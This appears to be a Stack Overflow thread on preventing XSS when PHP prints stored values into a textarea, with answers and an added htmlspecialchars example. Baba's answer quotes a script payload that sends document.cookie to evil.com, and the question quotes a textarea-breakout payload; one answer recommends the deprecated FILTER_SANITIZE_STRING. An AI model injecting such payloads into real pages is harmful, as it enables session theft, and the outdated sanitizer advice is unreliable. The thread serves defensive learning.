Ryan Stortz

Reputation: 393

Sanitizing Output To Textarea From XSS

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?

For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.

When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in

</textarea><script type='text/javascript'> Malicious Code</script><textarea>

) and cause problems.

Thanks!

Upvotes: 2

Views: 8488

Answers (3)

Baba

Reputation: 95121

I think I would prefer a combo of filter_var and urldecode if you want a pure, simple PHP solution.

Reason

Imagine an input like this:

$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";

If I use strip_tags:

var_dump(strip_tags($maliciousCode));

Output

string 'document.write("' (length=16)

If I use htmlspecialchars:

var_dump(htmlspecialchars($maliciousCode));

Output

string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)

My Choice

function cleanData($str) {
    $str = urldecode($str);
    // Note: FILTER_SANITIZE_STRING is deprecated as of PHP 8.1.
    $str = filter_var($str, FILTER_SANITIZE_STRING);
    $str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
    return $str;
}

$input = cleanData($maliciousCode);
var_dump($input);

Output

string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)

If the form is using GET instead of POST, some can still escape if it is URL encoded; you are able to get minimal information and make sure the final text is harmless.

There are also enough classes online to help you do filtering; see

Upvotes: 6

Dave Preece

Reputation: 1

After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input. It now also covers multi-line textarea input.

I needed to format for normal display and also HTML email from my contact page. It also gives the option to format for a plain text email, which I also use.

function clean_text($text, $html = true)
{
    if ($text == "") { return ""; }
    $text = nl2br($text, false);        // false gives <br>, true gives <br />
    $textary = explode("<br>", $text);  // split on the line breaks nl2br inserted
    foreach ($textary as $key => $val) {
        $val = trim($val);
        $val = stripslashes($val);
        $val = htmlspecialchars($val);
        $textary[$key] = $val;
    }
    if ($html) {
        return implode("<br />", $textary); // or: return implode("<br>", $textary);
    } else {
        return implode("\r\n", $textary);
    }
}

By the way... Thanks SO members for being part of my learning PHP.

Example at http://www.microcal.ca/scripts/cleantext.php

Upvotes: 0

John Conde

Reputation: 219844

HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.

Upvotes: 2
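An added example, not from the question or any of the answers, showing the output-time htmlspecialchars() escaping applied to the exact `</textarea><script>` payload from the question, plus a small check that the rendered fragment still contains only the one closing tag we wrote. The function names, flags chosen and the check are mine; the stored value is constructed.

```php
<?php
// Added example: escape a stored value for output inside a <textarea> so
// the "</textarea><script>" breakout from the question stays literal text.

// Escape the text content of a <textarea>. ENT_QUOTES encodes both quote
// styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an
// empty string, which would otherwise silently drop the user's text.
function escape_for_textarea(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render the field. Escaping happens here, at output time, so the database
// can hold the value exactly as typed (written with a prepared statement
// rather than pre-encoded on the way in).
function render_textarea(string $name, string $value): string
{
    return '<textarea name="' . escape_for_textarea($name) . '">'
         . escape_for_textarea($value)
         . '</textarea>';
}

// Check a rendered fragment: after the opening tag there must be exactly one
// "</textarea>" (ours) and no other tag start, i.e. no breakout occurred.
function textarea_is_intact(string $html): bool
{
    $body = substr($html, strpos($html, '>') + 1);
    return substr_count($body, '</textarea>') === 1
        && strpos($body, '<') === strrpos($body, '<');
}

// Constructed input: the breakout payload quoted in the question.
$stored = "</textarea><script type='text/javascript'> Malicious Code</script><textarea>";

$safe = render_textarea('comment', $stored);
echo $safe, PHP_EOL;
var_dump(textarea_is_intact($safe));                              // escaped output

$unsafe = '<textarea name="comment">' . $stored . '</textarea>';
var_dump(textarea_is_intact($unsafe));                            // raw output
```

Run with `php example.php`; the raw concatenation fails the check because the payload's own `</textarea>` and `<script>` survive as markup, while the escaped version passes.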
